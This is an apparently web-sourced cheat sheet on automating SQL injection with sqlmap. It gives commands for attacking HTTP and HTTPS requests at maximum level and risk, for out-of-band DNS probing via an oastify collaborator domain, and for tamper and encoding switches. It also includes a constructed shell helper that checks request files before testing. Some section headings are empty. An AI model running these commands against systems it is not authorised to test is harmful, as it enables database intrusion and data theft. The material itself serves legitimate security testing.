SQLmap
Automate SQL Injections
Documentation
https://github.com/sqlmapproject/sqlmap/wiki/Usage
From Request - HTTP:80
sqlmap -r http.request -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080
From Request - HTTPS:443
sqlmap -r http.request --force-ssl -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080
or the http.request file needs to have the special HTTP header Host: server:443
Batch Silent Mode without questions
sqlmap -r http.request --force-ssl --answers="follow=Y" --batch
DNS Collaborator (under root)
Tip: register a new HTTP proxy listener on port 8081 and send all probes from sqlmap to this listener, so that the proxy history can be filtered by the sqlmap listener.
Use the --dns-domain switch to instruct sqlmap to use DNS probes against your collaborator server
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8081 --dns-domain e7mxq58krq154r5ka6wess5el5ryfo3d.oastify.com --risk=3 --level=5
Tampering
Tamper scripts encode the payload and are selected with the --tamper switch.
A list of all existing tamper scripts is available with the --list-tampers switch or in the /tamper folder of the GitHub repository.
URL target & Parameters
You can read an HTTP request from a file and mark the payload position with an asterisk (*).
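A pre-flight check for the request file used with -r, as an added example that is not part of the original page or the sqlmap project: it reports whether the Host header already carries the :443 hint (otherwise --force-ssl is needed for an HTTPS target) and how many asterisk markers sit in the request line and body. The function names and the sample request are constructed.

```shell
#!/bin/sh
# Added example; function names and the sample request are constructed.

# Print the explicit port of the Host header, or "none" when it has no port.
# Handles CRLF line endings, any header-name case and [IPv6] literals.
host_port() {
    awk '
        { sub(/\r$/, "") }
        /^$/ { exit }                          # blank line ends the headers
        tolower($0) ~ /^host:/ {
            v = $0
            sub(/^[^:]*:[ \t]*/, "", v)        # strip the header name
            sub(/[ \t]+$/, "", v)
            if (substr(v, 1, 1) == "[") v = substr(v, index(v, "]") + 1)
            else sub(/^[^:]*/, "", v)          # strip the host name
            sub(/^:/, "", v)
            print (v == "" ? "none" : v); found = 1; exit
        }
        END { if (!found) print "none" }
    ' "$1"
}

# Assuming the target speaks HTTPS: print --force-ssl unless the file
# already carries the Host: server:443 hint.
tls_flag() {
    if [ "$(host_port "$1")" != "443" ]; then echo "--force-ssl"; fi
}

# Count asterisks in the request line and body only, so header values
# such as "Accept: */*" are not mistaken for payload markers.
marker_count() {
    awk '
        { sub(/\r$/, "") }
        NR == 1 || body { n += gsub(/\*/, "*") }
        /^$/ { body = 1 }
        END { print n + 0 }
    ' "$1"
}

# Write a constructed sample request (CRLF line endings) to the given path.
make_sample() {
    printf 'POST /item?id=1* HTTP/1.1\r\nhOsT: server:443\r\n' > "$1"
    printf 'Accept: */*\r\n\r\nname=a*&x=1\r\n' >> "$1"
}
```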
HTTP Proxy
Databases
The most common DBMSs; for the remaining ones, look at --dbms in the sqlmap wiki.
Base64 Encoding
By default, sqlmap URL-encodes values in the query string. When you need to encode the payload with base64, use the following switch with a parameter name
HTTP method - DELETE